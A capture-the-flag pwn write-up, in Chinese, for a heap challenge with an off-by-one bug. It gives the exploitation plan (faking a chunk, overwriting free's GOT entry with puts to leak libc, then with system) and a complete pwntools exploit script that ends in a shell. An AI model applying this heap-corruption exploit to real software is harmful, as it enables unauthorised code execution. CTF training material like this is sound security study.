漏洞点
off-by-one漏洞
攻击思路
由于程序没有show功能,所以无法直接通过unsortedbin泄露libc出来。
size和chunk是连在一起的,可以在此处伪造一个chunk,然后申请到这个chunk,就可以修改chunk为got表地址,可以修改free_got为puts,然后泄露libc地址,再修改为system即可。
EXP
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102
| from pwn import * from ctypes import * from libcfind import * from LibcSearcher import* import base64 import sys context(os='linux', arch='amd64', log_level='debug') context.terminal = ["tmux","splitw","-h"] debug = 1 if debug: p = process('./pwn') elf = ELF('./pwn') else: p = remote('challenge-d29d3112d3d2e499.sandbox.ctfhub.com', 24413) elf = ELF('./pwn')
s = lambda data: p.send(data) sa = lambda text, data: p.sendafter(text, data) sl = lambda data: p.sendline(data) sla = lambda text, data: p.sendlineafter(text, data) r = lambda num=4096: p.recv(num) rl = lambda text: p.recvuntil(text) pr = lambda num=4096: sys.stdout.write(p.recv(num)) inter = lambda: p.interactive() l32 = lambda: u32(p.recvuntil('\xf7')[-4:].ljust(4,'\x00')) l64 = lambda: u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) uu32 = lambda: u32(p.recv(4).ljust(4, '\x00')) uu64 = lambda: u64(p.recv(6).ljust(8, '\x00')) int16 = lambda data: int(data, 16) lg = lambda s, num: p.success('%s -> 0x%x' % (s, num))
libc = ELF('./libc-2.23.so') def add(size): rl("Choice:") sl('1') rl("Size: ") sl(str(size)) def delete(index): rl("Choice:") sl('3') rl("Index: ") sl(str(index)) def edit(index,content): rl("Choice:") sl('2') rl("Index: ") sl(str(index)) rl("Content: ") sl(content)
add(0x10) add(0x18) add(0x60) add(0x60) pause() for i in range(22): add(0x48) edit(10,'/bin/sh\x00') add(0x70) edit(1,p64(0)*3+'\xe1') delete(2) add(0x60) add(0x60) delete(3) delete(2) delete(27) add(0x60) edit(2,p64(0x602120)) add(0x60) add(0x60) add(0x60)
edit(28,p64(0x60)+p64(0)+p64(elf.got['free'])) edit(4,p64(0)*9+'\xa1') delete(5)
add(0x48) add(0x10) rl("Choice:") sl('2') rl("Index: ") sl('0') rl("Content: \n")
sl(p64(elf.plt['puts'])+p64(elf.plt['printf'])) delete(6) libc_leak = uu64() libc_base = libc_leak-0x3c4b78 lg("libc_base",libc_base) rl("Choice:") sl('2') rl("Index: ") sl('0') rl("Content: ") sl(p64(libc_base+libc.sym['system'])+p64(elf.plt['printf']))
delete(10)
inter()
|